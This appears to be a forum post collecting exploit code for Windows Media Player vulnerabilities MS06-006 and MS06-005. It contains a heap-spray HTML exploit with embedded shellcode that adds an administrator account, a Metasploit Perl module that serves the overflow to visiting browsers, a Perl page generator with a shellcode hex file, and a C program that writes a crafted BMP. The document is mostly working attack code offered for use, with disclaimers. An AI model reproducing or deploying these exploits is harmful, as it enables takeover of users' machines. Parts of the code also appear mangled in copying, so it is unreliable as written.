۱۰-مرداد-۱۳۸۵, ۱۲:۲۶:۱۸
کد:
<HTML>
<HEAD>
<TITLE>WMP Plugin EMBED Exploit</TITLE>
<SCRIPT>
// Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
// By Matthew Murphy (mattmurphy@kc.rr.com)
//
// DISCLAIMER:
//
// This exploit code is intended only as a demonstration tool for
// educational or testing purposes. It is not intended to be used for any
// unauthorized or illicit purpose. Any testing done with this tool must
// be limited to systems that you own or are explicitly authorized to
// test.
//
// By utilizing or possessing this code, you assume any and all
// responsibility for damage that results. The author will not be held
// responsible, under any circumstances, for damage that arises from your
// possession or use of this code.
//
// Tested:
// Firefox 1.5.0.1
// Windows Media Player 10
// Windows XP SP2 (US)
//
// The Windows Media Player plug-in for non-Microsoft browsers (Firefox,
// Opera, etc.) suffers from an exploitable overflow in its handling of
// EMBED tags. Specifically, a very long SRC property on such a tag can
// lead to an overflow that will corrupt a structured exception handling
// frame.
//
// The SEH frame is the vector of control that I exploit. Fortunately,
// DEP is turned off for non-Microsoft code, so there's no issue there.
// That's really a shame, because such a move would've made an already
// difficult exploit much harder.
//
// One of the reasons the exploit is tough is because the overrun buffer
// (the SRC attribute) is seriously mangled before it is handled by the
// plug-in. In particular, any character with the sign bit set (> 0x7F)
// is replaced.
//
// We could do as the creative wizards like HD Moore suggest and use an
// alphanumeric payload with some cute SEH tricks. Let me rephrase:
// YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly
// content to throw my code in another buffer and get around all the silly
// alpha-numeric sanitation. Sure beats devoting hours to beating it
// with fancy shellcode, all for a PoC I may never release.
//
// Instead, I shamelessly ripped a page from Skylined's book and borrowed
// (and cleaned up) the heap spraying technique. My heap-spray is a lot
// less precise, because the memory layout is a lot more variable. In
// my experience, it took a _HUGE_ block allocation to get the heap I
// wanted to jump to into a reliably-placed location. Hence the atrocity
// of the 16MB of noops below.
//
// Aside from the character restrictions, this is a standard stack-based
// overflow. I simply smash the SEH frame with a pointer to my HUGE heap
// block, which consists of a bunch of 0x41 characters. An INC ECX is a
// functional noop -- so the box takes the slide down the heap into the
// shellcode. The shellcode is a standard Win32 "add administrator"
// payload from Metasploit.
//
// This exploit is a lot of ripping, cleaning and re-implementation, but
// that just goes to show how easy it is to write. So... how about that
// 'Important' rating? A bit perplexing to rate a "click-and-own" as an
// Important... or is it just because nobody would *DARE* run one of those
// "Non-Microsoft" browsers on Windows?
// Spray the heap
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u41 41%u4141");
do {
spray += spray;
} while (spray.length < 0x1000000);
// If this is successful, you can login as a local admin:
//
// User: wmp0wn3d
// Pass: password
spray += unescape(
"%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713" +
"%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2" +
"%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292" +
"%ub81c%u9af2%ubd79%u02b9%u083b%uefb9%u4d90%u96b3" +
"%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2%u8db3%ufd92" +
"%u801c%u1032%u90c8%u7078%u901c%u9af2%u057c%ubf25" +
"%u4f93%u5b48%u07f3%uab39%u4c12%u9701%ucc1c%u1075" +
"%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9%u8c97%uf3f2" +
"%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02%u7cff%u9ff3" +
"%ue4c8%u65e1%u821d%u642e%uef70%uff14%ue9b9%ufe01" +
"%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c%ufbb7%ueb14" +
"%ufba7%ua817%uacf3%ufa09%uffe4%uf40e%ue8e5%ub459" +
"%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759%ueff8%uf718" +
"%ufef0%uee16%uace7%uff38%ue5fa%uf217%uf8e4%ufa0b" +
"%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817%uacf3%uda56" +
"%uc8d3%u9b79"
);
</SCRIPT>
</HEAD>
<BODY>
<EMBED
SRC="-----------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
--AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAA ANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWX
XXXYYYYZZZZ000011112222333344445555666677778888999 9.wmv"></EMBED>
</BODY>
</HTML>
Details: ExploitAlert Topic : MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta)
ExploitAlert Id : 321
Credit : Metasploit plugin
Date : 20.2.2006
Download
Exploit Code :
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wmp_plugin_ms06_006;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;
my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
};
my $info =
{
'Name' => 'Windows Media Player Plugin MS06-006 Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com',
],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a vulnerability in the Windows Media Player plugin
for non-Microsoft web browsers. This module has been tested with Windows
Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0
(Firefox 1.5 and Opera 8.5).
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' },
'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
},
'Payload' =>
{
# give some stack space, align esp
'Space' => 1024,
'BadChars' => "x00x22".join('', map { $_=chr($_) } (0x80 .. 0xff)),
'MinNops' => 0,
'MaxNops' => 0,
},
'Refs' =>
[
['CVE', '2006-0005'],
['OSVDB', '23132'],
['MSB', 'MS06-006'],
['BID', '15130'],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic - WMP 9.0', 0x07694b1e ]
],
'Keys' => [ 'wmp' ],
'DisclosureDate' => 'Feb 14 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;
# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " .
$self->GetVar('HTTPPORT'));
return;
}
my $httphost = $self->GetVar('HTTPHOST');
$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
$self->PrintLine("
[*] Waiting for connections to http://". $httphost
.":". $self->GetVar('HTTPPORT') ."/");
while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
sub HandleHttpClient
{
my $self = shift;
my $fd = shift;
# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Read the HTTP command
my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
my $agent;
# Read in the HTTP headers
while ((my $line = $fd->RecvLine(10))) {
$line =~ s/^s+|s+$//g;
my ($var, $val) = split(/:/, $line, 2);
# Break out if we reach the end of the headers
last if (not defined($var) or not defined($val));
$agent = $val if $var =~ /User-Agent/i;
}
my $addr;
##
# XXX Does not detect Windows SP levels or WMP version
##
# Windows NT and Windows 2000 systems
if ($agent =~ /Windows NT [45].0/) {
$self->PrintLine("
[*]Targetting WMP v9 on NT/2000...");
$addr = 0x07694b1e; # wmp.dll v9.00.00.2980
}
# Windows XP SP2
if ($agent =~ /Windows NT 5.1/) {
$self->PrintLine("
[*]Targetting WMP v9 on XP SP2...");
$addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
}
# Windows 2003 SP0
if ($agent =~ /Windows NT 5.2/) {
$self->PrintLine("
[*]Targetting WMP v9 on 2003 SP0...");
$addr = 0x585a6052; # wmp.dll v9.00.00.2991
}
my $target = $self->Targets->[$self->GetVar('TARGET')];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern = "C" x 4000;
$addr = $target->[1] if ! $addr;
# We can't use SEH getpc from inside a SEH handler on XP SP2 >
# So we do it like a drunk ninja.
my $getpc =
"x58x58x58". # pop eax, pop eax, pop eax
"x05x18x29x29x29". # add eax,0x29292917
"x2dx01x29x29x29". # sub eax,0x29292901
"x50x59"; # push eax, pop ecx
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
my $content = "<html><body><embed
type="application/x-mplayer2"
src="$pattern.wmv"></body></html>";
$self->PrintLine("
[*]HTTP Client connected from $rhost:$rport, sending
".length($shellcode)." bytes of payload...");
$fd->Send($self->BuildResponse($content));
# Prevents IE from throwing an error in some cases
select(undef, undef, undef, 0.1);
$fd->Close();
}
sub RandomHeaders {
my $self = shift;
my $head = '';
while (length($head) < 3072) {
$head .= "X-" .
Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
Pex::Text::AlphaNumText(int(rand(256) + 5)) ."rn";
}
return $head;
}
sub BuildResponse {
my ($self, $content) = @_;
my $response =
"HTTP/1.1 200 OKrn" .
$self->RandomHeaders() .
"Content-Type: text/htmlrn";
if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gziprn";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunkedrn";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "rn" .
"Connection: closern";
}
$response .= "rn" . $content;
return $response;
}
sub Chunk {
my ($self, $content) = @_;
my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "rn$chunkrn";
}
$chunked .= "0rnrn";
return $chunked;
}
sub Gzip {
my $self = shift;
my $data = shift;
my $comp = int(rand(5))+5;
my($wtr, $rdr, $err);
my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
print $wtr $data;
close ($wtr);
local $/;
return (<$rdr>);
}
1;
Details: ExploitAlert Topic : MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3)
ExploitAlert Id : 334
Credit : Matthew Murphy
Date : 24.2.2006
Download
Exploit Code :
#!/usr/bin/perl
#
# wmp-profiteer.pl
# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (mattmurphy@kc.rr.com)
#
# It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s.
#
# I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be
# customized!
#
# The usage of this tool is as follows:
#
# wmp-profiteer.pl [shellcode]
#
# The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a
# lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction.
#
# This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the
# browser.
#
# The standard disclaimer from the original exploit still applies, with some
# changes:
#
# This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or
# are explicitly authorized to test.
#
# By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your
# possession or use of this code.
$part1 =
"<!DOCTYPE HTML PUBLIC "-//W3C DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
<SCRIPT>
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u41 41%u4141");
do {
spray += spray;
} while (spray.length < 0x1000000);
spray += unescape("";
$part2 =
"");
</SCRIPT>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<EMBED SRC="";
$part3 =
""></EMBED>
</BODY>
</HTML>";
if (@ARGV != 1) {
print STDERR "Usage: $0 [shellcode file]";
}
open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html
for writing.";
print EXPLOIT $part1;
open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
while (!eof(SHELLCODE)) {
$ch1 = getc(SHELLCODE);
if (eof(SHELLCODE)) {
print EXPLOIT "%u00";
print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
} else {
$ch2 = getc(SHELLCODE);
print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));
}
}
close(SHELLCODE);
print EXPLOIT $part2;
print EXPLOIT "-"x2038;
print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL" ;
print EXPLOIT "AAAx05";
print EXPLOIT "NNNNOOOO";
print EXPLOIT "AAAx05";
print EXPLOIT
"QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ000011112 2223333444455556666777788889999.wmv&qu
ot;;
print EXPLOIT $part3;
close(EXPLOIT);
----------------------------------------------- shellcode.hex
-----------------------------------------
:020000040000FA
:100000002BC983E9C9D9EED97424F45B8173132118
:10001000C414F183EBFCE2F4DD2C50F121C49FB455
:100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861
:10003000AAF09FF0CFF5D4688D40D4852605DEFC6C
:100040002006FF051A9030F554219FAE05C5FF9795
:10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B
:1000600025072531454F54C1A4046CFDAA84187A94
:1000700051D8B97A49CCFFF8AA44A4F121C49F9978
:100080001D9B250741929D09A2046FA149349EF54D
:100090007EAC8C0FABCA430EC6A779950FA16C94AA
:1000A00001EB77D14FA160D154B7718301B379814E
:1000B00011B37AC245E4649052B7639E53A034DE14
:1000C000608050D107E2349F44B0349D4EA7759DA7
:1000D00046B67B8451E455954CAD7A9852B0669003
:1000E00055AB668201B3798111B37AC245E43BB066
:0400F000658014F122
:00000001FF
Details: ExploitAlert Topic : Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005)
ExploitAlert Id : 310
Credit : ATmaCA
Date : 16.2.2006
Download
Exploit Code :
/*
* For Remote Exploration (hint):
* http://www.spyinstructors.com/atmaca...remote_poc.asx
*/
/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/ad...D20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/
/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/
/*
*
* In this vulnerability,payload is loaded to different places in memory each time.
* but some time is very easy to call our shell code :
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* but some times not =) because of ,no shell this time
*
*/
/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/sec.../ms06-005.mspx
*
*/
#include <windows.h>
#include <stdio.h>
#define BITMAP_FILE_SIZE 0xA8D2
#define BITMAP_FILE_NAME "crafted.bmp"
#pragma pack( push )
#pragma pack( 1 )
// bitmap file format - http://atlc.sourceforge.net/bmp.html
//File information header provides general information about the file
typedef struct _BitmapFileHeader {
WORD bfType;
DWORD bfSize;
WORD bfReserved1;
WORD bfReserved2;
DWORD bfOffBits;
} BMPFHEADER;
//Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader{
DWORD biSize;
LONG biWidth;
LONG biHeight;
WORD biPlanes;
WORD biBitCount;
DWORD biCompression;
DWORD biSizeImage;
LONG biXPelsPerMeter;
LONG biYPelsPerMeter;
DWORD biClrUsed;
DWORD biClrImportant;
} BMPIHEADER;
#pragma pack( pop )
int main(void)
{
FILE *File;
BMPFHEADER *bmp_fheader;
BMPIHEADER *bmp_iheader;
char *pszBuffer;
printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
printf("\nBug discovered by eEye");
printf("\nExploit coded by ATmaCA");
printf("\nWeb: http://www.spyinstructors.com &&
http://www.atmacasoft.com");
printf("\nE-Mail: atmaca@icqmail.com");
printf("\nCredit to Kozan");
if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
printf("\n [E:] fopen()");
exit(1);
}
bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER) );
bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER) );
pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);
memset(pszBuffer,0x41,BITMAP_FILE_SIZE);
bmp_fheader->bfType = 0x4D42; // "BM"
bmp_fheader->bfSize = BITMAP_FILE_SIZE;
bmp_fheader->bfReserved1 = 0x00;
bmp_fheader->bfReserved2 = 0x00;
// eEye - MAGIC
// Antiviruses will get the signature from here!!!
bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );
bmp_iheader->biSize = 0x28;
bmp_iheader->biWidth = 0x91;
bmp_iheader->biHeight = 0x63;
bmp_iheader->biPlanes = 0x01;
bmp_iheader->biBitCount = 0x18;
bmp_iheader->biCompression = 0x00;
bmp_iheader->biSizeImage = 0xA89C;
bmp_iheader->biXPelsPerMeter = 0x00;
bmp_iheader->biYPelsPerMeter = 0x00;
bmp_iheader->biClrUsed = 0x00;
bmp_iheader->biClrImportant = 0x00;
memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER));
memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_iheader,si zeof(BMPIHEADER));
fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
fwrite("\x00", 1,1, File); //Terminator
fclose(File);
printf("\n\n" BITMAP_FILE_NAME" has been created in the current
directory.\n");
return 1;
}